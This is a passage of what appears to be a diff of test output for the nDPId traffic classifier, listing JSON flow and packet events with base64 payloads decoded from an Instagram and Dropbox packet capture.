gmbZkQlW0YI\/xZdFg6wN2R+J3fOBbBmIcOvB5bIKiWTEFFXRESk7pA\/G3UwXXKB8XDGTJIAkPv49GZuMRZBkC+FhZzCzZ\/iYJh8LIJjV10uzY7Q6E8RpFbyee3Ru25UC5ETbDsFPCaR1ZZC+Qlrsu3Z2QOnm5Ijct96wHLCiQoCUx5CFCGTynRCNjadMyB8tlLRKCwv7KX++dvy1I4Ngs+X8bALTsRQ81XIDydJihBYicmO+O5EykyOu25b+jIYCOXX2WfISuvyX8JiI2GJxqYZEg+OZPoDhxBrn8TYtguClNRehGIQDtqZcwjb\/V86w0sQMOHMZzpnYBjpA8i2eJoGlmik3CQHHMRm8DxLkyFvCZWDFGTUEVI6mHEnfCoaSoN+\/pJIKAlCT4XxDOVC6F8g19jfq1eEJAj0k3u3yFtEJC0DXJolurtJkzJ6y5KHJWSGujZ7ucFS0YjpIoSX0blPAySPJvg33fP2OLma7cQ\/o6PyUHgctick8cobWRNWzIJG3koi8vkKbBIHEMIhdatBUZ40kmN4wtVBz4xoAKljf4v6tXAUt\/sabl0bLkuRE5KikyGgBCbojsrcdwSEGEBomIUFpEl4TvPOqQ8EQF08if3O9FnhnUw2jwQHpaPsw+3EzgNs0zWy6OB623FWGwH7yRctwfDWnw6uSz7AvbHpmHBs+lzanaBkBBq2DLF24dyAfJ1fyW2F8GD9sWLVnjCGZF3EsLst8bQIxxKOwYkoOS2WRsw0xVMJlnywe3Dcc8w+9gQNiBfxyDpYA\/BXzFgEQ3SDtI\/Iov2XBZk1lmPY59tj\/SH+23V5dy\/iiOkLW8UdeiSozNTMFJIdoa309Kn34h+DTnlxZPJVqKRj7du3Uk37CetFC6vFxS2151HHC6aWXemK7B3BpAILjJ\/RL8v0ZA5dOz14w3bAaJWBEg+oUMkesS4WzNnMtGFzWDqZOmcWARMZvW5QUXehDRGok1aYS2VUwcI4nRFkmR4HYk3YsQQ7hbSjts4wBuESi5cIWAPkICk+lgVslThZsIux2ZS+mHik4DwoYI7IF8QlYXTsSiw2By7i5s7AeQhpAzljeQfkQaQPQMK5P3IVCAQHZWMgI="}
00966{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":255,"source":"instagram.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720900690,"flow_last_seen":1436720901259,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":24614,"flow_avg_l4_payload_len":769,"midstream":1,"thread_ts_msec":1436720901259,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.186","src_port":44379,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-e.ak.instagram.com","url":"photos-e.ak.instagram.com\/hphotos-ak-xaf1\/t51.2885-15\/e35\/11379148_1449120228745316_607477962_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":262,"source":"instagram.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720901262,"flow_last_seen":1436720901262,"flow_idle_time":7560000,"flow_min_l4_payload_len":258,"flow_max_l4_payload_len":258,"flow_tot_l4_payload_len":258,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1436720901262,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.153","src_port":37350,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00816{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":262,"source":"instagram.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1436720901262,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":324,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":324,"pkt_l4_len":290,"thread_ts_msec":1436720901262,"pkt":"ABsv8H60QPMIw47hCABFAAE2VBZAAEAGt67AqABnUlUamZHmAFCdoJYSxR9Z0oAYDfbnvwAAAQEICgAD66tZ6cc2R0VUIC9ocGhvdG9zLWFrLXhmYTEvdDUxLjI4ODUtMTUvZTM1LzExMjQ4ODI5Xzg1Mzc4MjEyMTM3Mzk3Nl85MDk5MzY5MzRfbi5qcGc\/c2U9NyBIVFRQLzEuMQ0KSG9zdDogcGhvdG9zLWEuYWsuaW5zdGFncmFtLmNvbQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogSW5zdGFncmFtIDcuMS4xIEFuZHJvaWQgKDE5LzQuNC4yOyA0ODBkcGk7IDEwODB4MTkyMDsgc2Ftc3VuZzsgR1QtSTk1MDU7IGpmbHRlOyBxY29tOyBpdF9JVCkNCg0K"}
00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":262,"source":"instagram.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720901262,"flow_last_seen":1436720901262,"flow_idle_time":7560000,"flow_min_l4_payload_len":258,"flow_max_l4_payload_len":258,"flow_tot_l4_payload_len":258,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1436720901262,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.153","src_port":37350,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-a.ak.instagram.com","url":"photos-a.ak.instagram.com\/hphotos-ak-xfa1\/t51.2885-15\/e35\/11248829_853782121373976_909936934_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":303,"source":"instagram.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720906017,"flow_last_seen":1436720906017,"flow_idle_time":180000,"flow_min_l4_payload_len":103,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1436720906017,"l3_proto":"ip4","src_ip":"192.168.0.106","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00592{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":303,"source":"instagram.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1436720906017,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":145,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":145,"pkt_l4_len":111,"thread_ts_msec":1436720906017,"pkt":"\/\/\/\/\/\/\/\/ABZEH1lmCABFAACDA5AAAIARdcjAqABq\/\/\/\/\/0RcRFwAb\/+ueyJob3N0X2ludCI6IDQxMzc2NzExNiwgInZlcnNpb24iOiBbMSwgOF0sICJkaXNwbGF5bmFtZSI6ICIiLCAicG9ydCI6IDE3NTAwLCAibmFtZXNwYWNlcyI6IFsyMDA5Mjk0MDNdfQ=="}
00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":303,"source":"instagram.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720906017,"flow_last_seen":1436720906017,"flow_idle_time":180000,"flow_min_l4_payload_len":103,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1436720906017,"l3_proto":"ip4","src_ip":"192.168.0.106","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
@@ -52,193 +52,193 @@
00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":306,"source":"instagram.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720906022,"flow_last_seen":1436720906022,"flow_idle_time":180000,"flow_min_l4_payload_len":103,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1436720906022,"l3_proto":"ip4","src_ip":"192.168.0.106","dst_ip":"192.168.0.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":308,"source":"instagram.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720906025,"flow_last_seen":1436720906025,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1436720906025,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"192.168.0.255","src_port":520,"dst_port":520,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":308,"source":"instagram.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1436720906025,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720906025,"pkt":"\/\/\/\/\/\/\/\/ABsv8H60CABFAAA0BsVAAEARsaPAqAABwKgA\/wIIAggAILagAgEAAAACAADAqAAAAAAAAAAAAAAAAAAB"}
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":309,"source":"instagram.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720906070,"flow_last_seen":1436720906070,"flow_idle_time":7440000,"flow_min_l4_payload_len":613,"flow_max_l4_payload_len":613,"flow_tot_l4_payload_len":613,"flow_avg_l4_payload_len":613,"midstream":1,"thread_ts_msec":1436720906070,"l3_proto":"ip4","src_ip":"31.13.93.52","dst_ip":"192.168.0.103","src_port":443,"dst_port":33934,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
01304{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":309,"source":"instagram.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1436720906070,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":679,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":679,"pkt_l4_len":645,"thread_ts_msec":1436720906070,"pkt":"QPMIw47hABsv8H60CABFAAKZYWZAAFUGhKgfDV00wKgAZwG7hI6seG5hv38UHoAYAGuTKQAAAQEICltMYqkAA+18FwMBAmCl7hwsC927JcFSAZYWLzz9PCOE13q\/R1R\/4Ep\/l7+HHbIpOFFcCYs42I3wFOgWiBw3wjx3pJOgTGydZF67jt6\/BKND+v8oyfRpnqlS5YMAWUNymHV7uHWxp+hxonkw6cNC93nRZtrxzkz6LP0NT0kghBPZC1Qj+5R6TJU9O4JNVgnaOk7a2PLjjlpxNviWyDprqQXVx0ggqtiTSBMr7Uc5EfDpzAAkL4Ijs+Gp7u5RRsTL\/vjjpIbFtLB91jbWUmuE049zO8Z0ZXe+NUKtpOUeDZz+3zpQ7uf3ydorfitQX7zdybIk3\/bzSVhOShF3BJrYBLAD2AQ24us0\/KfVGECFrd6OK2BQqjf6ncI9qOXNwiVF\/2inbzY\/Q3OsYRcS7XHEaq0O5REHcT8SzE5VoLX4XXQtBoZwVB5Yrj77GtBQdmGZD6u8UMQpctBx6N9Mr51OWWfdFnAbts6SnZuXGzlYjqJOxS7Vx73Uw8fCkf1IEri8UI1qbM9veDNciQdo3CmVyvU7iM87rUz7C0f+A4f1opsUJ5+EheBr1eGc36Efb4\/Ualnnz3nkJR3hncStDick4US+OxlgvGof266YJgZuAwCGxYg4vW2knDKYz5umzCws7lIHpIdAFNPByVtoUTPTPQS5UKgIEdb95j7F6DccGwtWvRW1Al5LucPJI7zWS2dtNSdT\/Ojj1Rno0QRGwZ45j0In5POotAgCjk30MTwIN5HhcpigFfTCmuPMsYmTn6MoC7DboyOfYCjSc6fhkNqfZ2xyKSzKyqklgdTHeGfRwO+op5ygRsksmKTJ1Q\/4mw=="}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":310,"source":"instagram.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1436720906070,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720906070,"pkt":"ABsv8H60QPMIw47hCABFAAA0Ga9AAEAG48TAqABnHw1dNISOAbu\/fxQerHhwxoAQAW09dwAAAQEICgAD7YxbTGKp"}
01772{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":311,"source":"instagram.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1436720908201,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1015,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1015,"pkt_l4_len":981,"thread_ts_msec":1436720908201,"pkt":"ABsv8H60QPMIw47hCABFAAPpGbBAAEAG4A7AqABnHw1dNISOAbu\/fxQerHhwxoAYAW1v8wAAAQEICgAD7mFbTGKpFwMBA7AOHMI1ALyiYU3ya6qg+prWQI\/n9ANspqMl7L4ePI46MbeMU\/IIKBcoHTRp\/G5Sihc5nIJHuC2+37mEcl691gW4u\/TM4cTkpTf1jvX2GQ4y6\/txghh7z8FoXfNbqCHIq72qOYxX78zowj+FiMRcWPEmeWcWoH+gdWfhPA\/lkpOWh7PAWcTM6YhVbfKMzFVog0eNO6nAQ6Db4QV49GBIVCzfrXCBVeXZAcW0CL72bBYmhxsuCeKWPO3s6v5st61\/TqBX2wKyuhuh0iYRoQoS\/wYMoppq1iw5UM\/55LosXWjVhX+LnpSLv52m8IfyQkh1vrv+SJ7KjFgIF5haejMGRgEB6k28tUeT6FGaiUo32klBF\/ovhJ\/7PzYE5+p1Zs2WdUsskxD79HTvK6ta+oXXgI8zxnT+FY6f4Y3Qg+b6yTS68sbWyHT6\/PezdvhWfHtL0SSgHp8goibROD\/tT\/ewXwhvrOEixGKhip+cFDAiL8AxMi3V3Lo6cis85J1puKveGyk09JQyFUAk\/2r5Yl++ASyNB2yelevEI5wg+VsEb8Rcm\/QA7noQyfs1T5YOnO8NCBiPmye5eIk\/wZxnX1f+2xdUrgycDikO6k0cQg3utcfRP10t4qmvTrg2ek70WkuE+ATLg2Um1eRaeb81BxGpDBojTreWbcm5dcICJMpu5Jn\/w\/\/OFgLDd8zIcqEDUouT6ZCScciar49BKHurWy8NKFla9SI75KJQz9yq3QZyAG0rJc2lhQMyl9+7b4Ogizx8Jo29kTu8fZJSlg+ABrC1jcExXQD49OmAnZxwfKy6D2pC9Rse0qtqmzV+ovVEbJp+oxkyoXka2nmc36kfQhlZgI7KVixFLMTTlCevMnYrq1xJ\/MKzvCd6IWf+N5EocWD+ilOqptHNEIAOXJmgXODhL5KGWjQb8\/91W1IyUi6q\/ngSGvVRUpY8iujk6L\/C+Bbj\/Dm4AkcumBcragxaghvlWXmc47QSkqomVkZppr19doVE596Z\/iAcdVNMq1wy+2v27UYh5CMr3l5X59P07fb7g36BHbE7SHRjrHyy9CTFMxhEf0YgUq5TdIHDFI5lE\/KxLNZVidU3ki5Un7VFtJrfQka6os1jVOGfB9pUZq5Qsmwf1i\/ygu+C28zlN53MQWP6wHjI3WJZUBr81SukNH57IK2c2EyIu0E+HAgTgoJHe51A\/fUmZ1cYv7+JWrlM8pRHdKg4V83a8+0QRZUGb14qwNk4zB82iOuTyKlfeqGDo1mtsQ=="}
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":312,"source":"instagram.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908216,"flow_last_seen":1436720908216,"flow_idle_time":7440000,"flow_min_l4_payload_len":949,"flow_max_l4_payload_len":949,"flow_tot_l4_payload_len":949,"flow_avg_l4_payload_len":949,"midstream":1,"thread_ts_msec":1436720908216,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33935,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
01761{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":312,"source":"instagram.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1436720908216,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1015,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1015,"pkt_l4_len":981,"thread_ts_msec":1436720908216,"pkt":"ABsv8H60QPMIw47hCABFAAPpl5BAAEAGYi7AqABnHw1dNISPAbuBQH+NqOzE9YAYAR7+6wAAAQEICgAD7mJbGFWXFwMBA7DGXKcxYYzj4PsFQPMmYQehh8iuvFDU6ChyMypfRInDCFuixSLIKOq63dIUv38njMJN2kVy\/t+T8m9xPVbEGAFdD3PpSc3SZZnBHiv5tCRNZzMhDLWXPkOIN9Lutipqd5IVnEEsBFkO\/fZ2K81T8PYPXOUELo\/sV11FwruvuAKdrrJSJDxsNb8ZavjfuhrjTCNZ8992aq+Ku9jOSU4Xa7Q\/BYCty1PvPxxBeD0eYCG+tOtkysHtjUZlr1d4OQxDr\/61YS0x9iJOXjnMBoobCu17VKBkd2hUXNptzi\/uIUhzamB9Rremxs\/xa5ErUN6bjCfTqClJMKTo2+EPLLC2OrnUwhZPfwAqX4LMjZxrO4OjWeKTq0PJEWrYJt\/hZgR9r16F85siGrf6FK1kTDvb0+vybKakTv5L4R+tKZVBNuaZabfxVkkl5TNMskAuzgaRl4NAmD9vaxsUvWa1r1eavZpU2b4i3TllipunjR4aQEFb47bl0X9Ru9Hl1x54J53nJ+MJknrPmdJbHBa5kRwAqKgaQptXtnMz1WTWV+Q8a53Upaic+O0txvujdC90+KUOiiTbhfTw0gAmNmPQmi2l+V2tphQpp2jEsWxETCl2LSUnlcR9XDLGnBO3KYnN9C0+k2yBKCMObHAcOzwdJWheAOhMNBVSNpFtrfOE6uSTsVbDj23xeCxxC1QAM7YJmxoVRhtdVyIDYYANmHTFeA\/uC6oLDeExrKyQP7kSEfNbdUqTNPu\/MJKIjJDZu1yLmyvi1O\/nGho5EDKw8IVXPxnfKKPvaQH2GtI88pEfGeAEyC\/HE\/tmFwWll7dh2qPp5A3wF8sKJ3O0eDAbcGfPED7oJA+EsxJAhKT6isvErCueBtWMHVSeiLsoME8tf6cS9zzgnk33LczZTQgm29MSHE7ZL2GeiGbzuGwrTGDnk1VDLJRove2wMug8H7\/TzDu7ltmYb22OyZHWPR+qBc0SXnC41HvKpdG4l5lloyRu51PXhn1Z4SBmRKxgHOd10WPpGH9Et\/GeMS7LFYrc7oqcb6G7UCvo5VgI1SuJrJeY0vV2tCM0MyJYykeRmE4\/7F1xpcmuoE1e5ET3+6eiLGpqXUS7VkABwgQafZxjQScCWI5pekzUYOfjX5epPROl\/DzQKTCdpj3Gvhf2XBY54ImjWPLE32kUQllKDfXNIYtYFjXJbjsc4Zka4\/X4kGWgbCWN+dmnakKME8cbt\/+4rEk8PQFIv1W4FPcpki7hccXc0xhFEqm0Sw=="}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":315,"source":"instagram.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1436720908259,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908259,"pkt":"QPMIw47hABsv8H60CABFAAA0u1VAAFUGLR4fDV00wKgAZwG7hI+o7MT1gUCDQoAQAFyKzgAAAQEIClsYbBQAA+5i"}
02366{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":325,"source":"instagram.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1436720908432,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1464,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1464,"pkt_l4_len":1430,"thread_ts_msec":1436720908432,"pkt":"QPMIw47hABsv8H60CABFAAWqu1ZAAFUGJ6cfDV00wKgAZwG7hI+o7MT1gUCDQoAQAFzmhwAAAQEIClsYbL0AA+5iFwMBBgCkPdU4R6wGSIS3keHeixTLTI9zV+il0PpZ8q91YamIsd4IZ1iA9S2D6W\/nJ4T6403w2+fJe+hdEKNsk0963CdXOEXDNkQKpXOBBE+0Y\/4Fle8ueshRyGFFEoc6PtZpKpwayy+TKxEJ4pFJyX2oGMWjaZzaOyD59AskeV\/YOll+Xm0S27uMjZKkLBkCxDNPTNhB8fh\/syM9nxdE4huEu1SgtsgSRap7+5OfSJa0vJji4Lac5HIGGpVuCAdsaWkkirxUeGhBT5KqUaH3z34YK2q9OCFDjG6zQx+K5wB6\/1tRpCV4T0Wdq9iazWqTK9fhu3Q8m7M+n+OlMsKGxDIEQhTmUFv6EsILdWY4XaXzsNt68ilI12u8FIErHj5xADP5BSss+D\/PqbyyYfj1siM7kMLTpiPXuCUljd29w+P7wtJOUzlqcHwFv60jtkmE5R7DR9LN47rlhx2ZgEX8b9nsvGl\/Z1KSCJ1m3XV6f0806axX94l9imfNEVAHweCX3kOlfFNWODbpNzNbLbpVtPn7xKRA5Y140DajcNQvyREJ7DrHWIxbEPKUq+SIMaNEJqDkl0rYnPqvJYuixcmcTK6joyocw7sF+MmuWuJzAwYoGvQacoqaNqOp0iEPlyz8x6cTF7HbzVKHlLYHsfsKMGz98miVsnjvci5f7S+qZN8wJt+ycMpErrmm5SYVwnyDiARUnY01FjBiu7oXosmSU8r8tl1Y7oQcefwWQmUMJwEVoICnXk5o\/1P1fTAJawMxQor10OxDf\/BV8+4BnkZNbktKhC4u6rpy4t9mTFTFoJnekuOgtsyuYF1D1pTovQynkNog8sbNDLg6lOVy2sSjtN38M5BrjfWP6NvWf5rAbsDm9Qvw2VUkrLm+vXfuLJeKqhTOHspJB2ZVScw6fgqCCRgXV4hbT47jXkZHPFeUj3xtv5oznldP1XEp\/Y0YyZnWCMaWATZlGVUiSYeiFbrcd70L0WujcTQSesgJzHbOqeptYMiDDVIYXi5utFDZis9FPZA2ul\/lArmvEL\/urLFDKdnXMnNjyIIqJtwWZlcpDAHOfD2KyMM51NtnpD3NXBz6ngCZNoi3DrWeJbaK2NX4FFrr9nkmfuHb0MCV8zapTpFVeDqmiCnEMr1A22q06nZsJij0BS+jpAlud6+DjOPKWljFzy06Xn15YGW3Dm07Vi1rGNQXnlLIYZbH\/Lf9VbK8rn+tf2U4X+kmR\/seSiHTIiCrfQRY82NcG+s2JE\/3RNuUUsdP3+A8UZATxsKmMNb9p9jduLcV5NSz3qcz\/E+TORnhzC5qM5iDlSbThKZAPEgvS54QGz00rdEYWdvIwL1jLd2l2yP9aEoOWrH+sNsRBCU97PG1IRhRS5jctVYyDntPEBlAbqGj6sdT5C6POfN9JdpaIsZmGaMmnU0z4bjokazZ5F6F501SFGcsFKmgoCdZLCQyyA\/CkkbqEF1LeEPM1KkE88DAsVjRhjRCz9D6VKRt8PZdtywXXp7E7yF8+4SN\/2h5CqHv4N+v+ejLyvCd2t1L4BFuJ7BTwaB6NicxBq3cWSEeADsWxC4xODPl+fmk90gThIrGh3\/E3G\/K8LjJkXPwBqDPoSCAh\/lyvY4cI9USKSjdTboTHfChgT73IzMJk4MESnvGhexHkwWw4ndKaJ88XZfXiGJCI\/GHCwJX7Zu\/IG7bV7st4TnImk\/Ds\/xEG7y3JgmTAc9wIRPfDmTaMW0XI0vpt5j1BnCLq+es4TBuh9vggrd8U5G3S+2hj2u1HQPo3wjRAM4dNo6in8nnmD4n\/\/G9yrHWQwizkMQMUhZbY0jDslavyFSGnWc0JVIhfEzkCZm+lGdYxoDPUYKjjFRFeJ8o"}
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":309,"source":"instagram.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720906070,"flow_last_seen":1436720906070,"flow_idle_time":7560000,"flow_min_l4_payload_len":613,"flow_max_l4_payload_len":613,"flow_tot_l4_payload_len":613,"flow_avg_l4_payload_len":613,"midstream":1,"thread_ts_msec":1436720906070,"l3_proto":"ip4","src_ip":"31.13.93.52","dst_ip":"192.168.0.103","src_port":443,"dst_port":33934,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
01304{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":309,"source":"instagram.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1436720906070,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":679,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":679,"pkt_l4_len":645,"thread_ts_msec":1436720906070,"pkt":"QPMIw47hABsv8H60CABFAAKZYWZAAFUGhKgfDV00wKgAZwG7hI6seG5hv38UHoAYAGuTKQAAAQEICltMYqkAA+18FwMBAmCl7hwsC927JcFSAZYWLzz9PCOE13q\/R1R\/4Ep\/l7+HHbIpOFFcCYs42I3wFOgWiBw3wjx3pJOgTGydZF67jt6\/BKND+v8oyfRpnqlS5YMAWUNymHV7uHWxp+hxonkw6cNC93nRZtrxzkz6LP0NT0kghBPZC1Qj+5R6TJU9O4JNVgnaOk7a2PLjjlpxNviWyDprqQXVx0ggqtiTSBMr7Uc5EfDpzAAkL4Ijs+Gp7u5RRsTL\/vjjpIbFtLB91jbWUmuE049zO8Z0ZXe+NUKtpOUeDZz+3zpQ7uf3ydorfitQX7zdybIk3\/bzSVhOShF3BJrYBLAD2AQ24us0\/KfVGECFrd6OK2BQqjf6ncI9qOXNwiVF\/2inbzY\/Q3OsYRcS7XHEaq0O5REHcT8SzE5VoLX4XXQtBoZwVB5Yrj77GtBQdmGZD6u8UMQpctBx6N9Mr51OWWfdFnAbts6SnZuXGzlYjqJOxS7Vx73Uw8fCkf1IEri8UI1qbM9veDNciQdo3CmVyvU7iM87rUz7C0f+A4f1opsUJ5+EheBr1eGc36Efb4\/Ualnnz3nkJR3hncStDick4US+OxlgvGof266YJgZuAwCGxYg4vW2knDKYz5umzCws7lIHpIdAFNPByVtoUTPTPQS5UKgIEdb95j7F6DccGwtWvRW1Al5LucPJI7zWS2dtNSdT\/Ojj1Rno0QRGwZ45j0In5POotAgCjk30MTwIN5HhcpigFfTCmuPMsYmTn6MoC7DboyOfYCjSc6fhkNqfZ2xyKSzKyqklgdTHeGfRwO+op5ygRsksmKTJ1Q\/4mw=="}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":310,"source":"instagram.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1436720906070,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720906070,"pkt":"ABsv8H60QPMIw47hCABFAAA0Ga9AAEAG48TAqABnHw1dNISOAbu\/fxQerHhwxoAQAW09dwAAAQEICgAD7YxbTGKp"}
01772{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":311,"source":"instagram.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1436720908201,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1015,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1015,"pkt_l4_len":981,"thread_ts_msec":1436720908201,"pkt":"ABsv8H60QPMIw47hCABFAAPpGbBAAEAG4A7AqABnHw1dNISOAbu\/fxQerHhwxoAYAW1v8wAAAQEICgAD7mFbTGKpFwMBA7AOHMI1ALyiYU3ya6qg+prWQI\/n9ANspqMl7L4ePI46MbeMU\/IIKBcoHTRp\/G5Sihc5nIJHuC2+37mEcl691gW4u\/TM4cTkpTf1jvX2GQ4y6\/txghh7z8FoXfNbqCHIq72qOYxX78zowj+FiMRcWPEmeWcWoH+gdWfhPA\/lkpOWh7PAWcTM6YhVbfKMzFVog0eNO6nAQ6Db4QV49GBIVCzfrXCBVeXZAcW0CL72bBYmhxsuCeKWPO3s6v5st61\/TqBX2wKyuhuh0iYRoQoS\/wYMoppq1iw5UM\/55LosXWjVhX+LnpSLv52m8IfyQkh1vrv+SJ7KjFgIF5haejMGRgEB6k28tUeT6FGaiUo32klBF\/ovhJ\/7PzYE5+p1Zs2WdUsskxD79HTvK6ta+oXXgI8zxnT+FY6f4Y3Qg+b6yTS68sbWyHT6\/PezdvhWfHtL0SSgHp8goibROD\/tT\/ewXwhvrOEixGKhip+cFDAiL8AxMi3V3